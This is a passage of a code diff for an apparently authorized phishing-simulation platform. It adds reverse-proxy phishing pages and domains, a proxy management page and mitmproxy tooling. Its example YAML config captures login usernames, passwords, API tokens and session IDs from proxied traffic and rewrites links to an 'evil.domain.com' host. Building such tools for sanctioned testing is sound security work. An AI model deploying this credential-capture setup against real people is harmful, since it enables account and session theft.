'small', alignText: 'center' }, - { column: 'Custom Certificates', size: 'small', alignText: 'center' } + { column: 'Custom Certificates', size: 'small', alignText: 'center' }, + { column: 'Type', size: 'small', alignText: 'center' }, + { column: 'Target Domain', size: 'small' } ]} - sortable={['Name', 'Hosting website', 'Redirects']} + sortable={['Name', 'Hosting website', 'Redirects', 'Type']} hasData={!!domains.length} plural="domains" pagination={tableURLParams} @@ -541,13 +636,26 @@ title={domain.name} class="block w-full py-1 text-left" > - {domain.name} + {#if domain.type === 'proxy'} + {/if}{domain.name} + +
+ + {#if domain.type === 'proxy'} + + {:else} + 📄 + {/if} + +
+
+ {domain.type === 'proxy' ? domain.proxyTargetDomain : ''} @@ -562,21 +670,39 @@ on:click={() => openUpdateModal(domain.id)} {...globalButtonDisabledAttributes(domain, contextCompanyID)} /> - openUpdateContentModal(domain.id)} - {...globalButtonDisabledAttributes(domain, contextCompanyID)} - /> - openUpdateNotFoundContentModal(domain.id)} - {...globalButtonDisabledAttributes(domain, contextCompanyID)} - /> - openCopyModal(domain.id)} /> - openDeleteAlert(domain)} - {...globalButtonDisabledAttributes(domain, contextCompanyID)} - > + {#if domain.type !== 'proxy'} + openUpdateContentModal(domain.id)} + {...globalButtonDisabledAttributes(domain, contextCompanyID)} + /> + openUpdateNotFoundContentModal(domain.id)} + {...globalButtonDisabledAttributes(domain, contextCompanyID)} + /> + openCopyModal(domain.id)} /> + openDeleteAlert(domain)} + {...globalButtonDisabledAttributes(domain, contextCompanyID)} + > + {:else} + + + + + {/if} gotoDomainAssets(domain.name)} /> @@ -608,34 +734,36 @@ placeholder="example.com">Domain - + {#if !isProxyDomain} + - {#if !formValues.hostWebsite} - Redirect URL + {#if !formValues.hostWebsite} + Redirect URL + {/if} {/if}
- +

- SSL Configuration + TLS Configuration

+ diff --git a/frontend/src/routes/page/+page.svelte b/frontend/src/routes/page/+page.svelte index 2da9d27..5d3e923 100644 --- a/frontend/src/routes/page/+page.svelte +++ b/frontend/src/routes/page/+page.svelte @@ -18,6 +18,7 @@ import TableCellAction from '$lib/components/table/TableCellAction.svelte'; import Modal from '$lib/components/Modal.svelte'; import FormGrid from '$lib/components/FormGrid.svelte'; + import ProxySvgIcon from '$lib/components/ProxySvgIcon.svelte'; import BigButton from '$lib/components/BigButton.svelte'; import FormColumns from '$lib/components/FormColumns.svelte'; import FormColumn from '$lib/components/FormColumn.svelte'; @@ -33,6 +34,7 @@ import { fetchAllRows } from '$lib/utils/api-utils'; import { BiMap } from '$lib/utils/maps'; import AutoRefresh from '$lib/components/AutoRefresh.svelte'; + import SimpleCodeEditor from '$lib/components/editor/SimpleCodeEditor.svelte'; // services const appStateService = AppStateService.instance; @@ -42,7 +44,10 @@ let formValues = { id: null, name: null, - content: null + content: null, + type: 'regular', + targetURL: null, + proxyConfig: null }; let isSubmitting = false; @@ -63,6 +68,54 @@ name: null }; + // proxy example configuration - simplified to only capture and replacement rules + const proxyExample = `capture: + - name: 'login credentials' + method: 'POST' # optional, default GET + path: '/login' # regex path pattern - matches /login exactly + find: 'username=([^&]+)&password=([^&]+)' # REQUIRED - regex pattern to capture data + from: 'request_body' # where to capture from: request_body, request_header, response_body, response_header, any + # required: true # default - all captures are required unless explicitly set to false + + - name: 'has completed login' + method: 'GET' + path: '/secure' # navigation tracking - just checks if user visited this path + # no find pattern needed for path-based navigation tracking + # required: true # default - user must visit /secure before campaign progresses + + - name: 'form submission' + method: 'POST' + path: '/submit-data' # tracks POST requests to this endpoint + # no find pattern needed - just tracking that the form was submitted + + - name: 'profile update' + method: 'PUT' + path: '/api/profile' # tracks PUT requests for profile updates + # navigation tracking works with any HTTP method + + - name: 'api tokens' + path: '/api/v\\d+/auth.*' # regex - matches /api/v1/auth, /api/v2/auth/token, etc. + find: 'token=([a-zA-Z0-9]+)' # REQUIRED - all captures must have a find pattern + from: 'response_body' + + - name: 'optional tracking data' + path: '^/dashboard' # regex - matches paths starting with /dashboard + find: 'session_id=([a-f0-9]+)' # REQUIRED - find pattern is mandatory + from: 'response_header' + required: false # explicitly mark as optional - campaign will progress without this + +replace: + - name: 'replace logo' + find: 'https://target\\.example\\.com/logo\\.png' + replace: 'https://evil.domain.com/assets/logo.png' + + - name: 'replace links' + find: 'href="([^"]*target\\.example\\.com[^"]*)"' + replace: 'href="https://evil.domain.com$1"'`; + + $: isRegularPage = formValues.type === 'regular'; + $: isProxyPage = formValues.type === 'proxy'; + $: { modalText = getModalText('page', modalMode); } @@ -156,7 +209,20 @@ const create = async () => { try { - const res = await api.page.create(formValues.name, formValues.content, contextCompanyID); + const pageData = { + name: formValues.name, + type: formValues.type, + content: isRegularPage ? formValues.content : null, + targetURL: isProxyPage ? formValues.targetURL : null, + proxyConfig: isProxyPage ? formValues.proxyConfig : null + }; + + const res = await api.page.create( + pageData.name, + pageData.content, + contextCompanyID, + pageData + ); if (!res.success) { formError = res.error; return; @@ -172,10 +238,15 @@ const update = async () => { try { - const res = await api.page.update(formValues.id, { + const updateData = { name: formValues.name, - content: formValues.content - }); + type: formValues.type, + content: isRegularPage ? formValues.content : null, + targetURL: isProxyPage ? formValues.targetURL : null, + proxyConfig: isProxyPage ? formValues.proxyConfig : null + }; + + const res = await api.page.update(formValues.id, updateData); if (!res.success) { formError = res.error; return; @@ -217,6 +288,9 @@ formValues.content = ''; formValues.name = ''; formValues.id = ''; + formValues.type = 'regular'; + formValues.targetURL = ''; + formValues.proxyConfig = ''; form.reset(); formError = ''; }; @@ -226,6 +300,17 @@ modalMode = 'update'; refreshAllDomains(); showIsLoading(); + + // Reset form values first + formValues = { + id: null, + name: null, + content: null, + type: 'regular', + targetURL: null, + proxyConfig: null + }; + try { const page = await getPage(id); const r = globalButtonDisabledAttributes(page, contextCompanyID); @@ -234,8 +319,8 @@ return; } - isModalVisible = true; assignPage(page); + isModalVisible = true; } catch (e) { addToast('Failed to load page', 'Error'); console.error('failed to get page', e); @@ -247,11 +332,22 @@ const openCopyModal = async (id) => { modalMode = 'copy'; showIsLoading(); + + // Reset form values first + formValues = { + id: null, + name: null, + content: null, + type: 'regular', + targetURL: null, + proxyConfig: null + }; + try { const page = await getPage(id); - isModalVisible = true; assignPage(page); - page.id = null; + formValues.id = null; // Clear ID for copy + isModalVisible = true; } catch (e) { addToast('Failed to load page', 'Error'); console.error('failed to get page', e); @@ -269,7 +365,10 @@ const assignPage = (page) => { formValues.id = page.id; formValues.name = page.name; - formValues.content = page.content; + formValues.content = page.content || ''; + formValues.type = page.type && page.type.trim() !== '' ? page.type : 'regular'; + formValues.targetURL = page.targetURL || ''; + formValues.proxyConfig = page.proxyConfig || ''; }; /** @param {*} event */ @@ -341,18 +440,115 @@ - -
- Name +
+ +
+

+ Basic Information +

+
+
+ Name +
+
+
+
+
+

+ Type +

+
+
+ + +
+
+
+
+
- - + + +
+

+ {#if isProxyPage} + Proxy Configuration + {:else} + Page Content + {/if} +

+ + {#if isRegularPage} + + {/if} + + {#if isProxyPage} +
+
+
+

+ Proxy Capture & Replacement Rules (YAML) +

+
+ Data captures require a 'find' pattern. Path-based navigation tracking (any + method) doesn't need 'find'. All captures are required by default. +
+
+
+ +
+
+
+ {/if} +
+ + +
+ diff --git a/frontend/src/routes/proxy/+page.svelte b/frontend/src/routes/proxy/+page.svelte new file mode 100644 index 0000000..dd0fc6f --- /dev/null +++ b/frontend/src/routes/proxy/+page.svelte @@ -0,0 +1,467 @@ + + + +
+
+ Proxies + { + refreshProxies(false); + }} + /> +
+ New Proxy + + {#each proxies as proxy} + + + + + + {proxy.startURL} + + + + + openUpdateModal(proxy.id)} + {...globalButtonDisabledAttributes(proxy, contextCompanyID)} + /> + openCopyModal(proxy.id)} /> + openDeleteAlert(proxy)} + {...globalButtonDisabledAttributes(proxy, contextCompanyID)} + > + + + + {/each} +
+ + +
+ +
+

+ Basic Information +

+
+
+ Name +
+
+ Start URL +
+
+
+ Description +
+
+ + +
+
+
+

+ Proxy Configuration +

+
+ +
+
+
+
+ + +
+ + +
+
+ onClickDelete(deleteValues.id)} + bind:isVisible={isDeleteAlertVisible} + > +
diff --git a/makefile b/makefile index d4fb626..dae715d 100644 --- a/makefile +++ b/makefile @@ -1,6 +1,6 @@ -.PHONY: build down up fix-tls backend-purge backend-down purge logs backend-password +.PHONY: build down up fix-tls backend-purge backend-down purge logs backend-password dbgate-down dbgate-up up: - sudo docker compose up -d backend frontend api-test-server pebble dbgate mailer dozzle stats dns test; \ + sudo docker compose up -d backend frontend api-test-server pebble dbgate mailer dozzle stats dns test mitmproxy; \ sudo docker compose logs -f --tail 1000 backend frontend; down: -sudo docker compose down --remove-orphans @@ -49,11 +49,13 @@ backend-reset: sudo docker compose up -d backend; \ sudo docker compose logs -f --tail 1000 backend; backend-db-reset: + sudo docker compose stop dbgate; \ sudo rm -f ./backend/.dev/db.sqlite3; \ sudo docker compose exec backend bash -c "rm -rf /app/.dev/db.sqlite3"; sudo docker compose stop backend; \ sudo rm -rf ./backend/.dev/* touch -c ./backend/.dev/db.sqlite3; \ + sudo docker compose start dbgate; \ sudo docker compose up -d backend; backend-password: @echo "Finding password"; sudo docker compose logs backend | grep -F "Password:" | tail -n 1 @@ -77,7 +79,11 @@ frontend-logs: # dbgate dbgate-restart: - sudo docker compose restart dbgate; \ + sudo docker compose restart dbgate; +dbgate-up: + sudo docker compose start dbgate; +dbgate-down: + sudo docker compose stopdbgate; # pebble pebble-attach: @@ -126,3 +132,32 @@ dozzle-logs: sudo docker compose logs -f --tail 1000 dozzle dozzle-restart: sudo docker compose restart dozzle + +# mitmproxy +mitmproxy-logs: + sudo docker compose logs -f --tail 1000 mitmproxy +mitmproxy-restart: + sudo docker compose restart mitmproxy +mitmproxy-up: + sudo docker compose up -d mitmproxy +mitmproxy-down: + sudo docker compose stop mitmproxy +mitmproxy-attach: + sudo docker compose exec mitmproxy sh +mitmproxy-reset: + sudo docker compose stop mitmproxy; \ + sudo docker compose rm -f mitmproxy; \ + sudo docker compose up -d mitmproxy; \ + sudo docker compose logs -f --tail 1000 mitmproxy; +mitmproxy-token: + sudo docker compose logs mitmproxy | grep -i "web server listening" | tail -1 || echo "Token not found - try: make mitmproxy-logs" +mitmproxy-password: + @echo "Latest mitmproxy password/token:"; sudo docker compose logs mitmproxy | grep -oE "token=[a-zA-Z0-9]+" | tail -1 | cut -d= -f2 || echo "Password not found - make sure mitmproxy is running" +mitmproxy-url: + @echo "mitmproxy web interface URL:"; sudo docker compose logs mitmproxy | grep -oE "http://0\.0\.0\.0:8080/\?token=[a-zA-Z0-9]+" | tail -1 | sed 's/0\.0\.0\.0:8080/localhost:8105/' || echo "URL not found - make sure mitmproxy is running" +mitmproxy-purge: + sudo docker compose stop mitmproxy; \ + sudo docker compose rm -f mitmproxy; \ + sudo docker volume rm -f phishingclub_mitmproxy_data; \ + sudo docker compose up -d mitmproxy; \ + sudo docker compose logs -f --tail 1000 mitmproxy;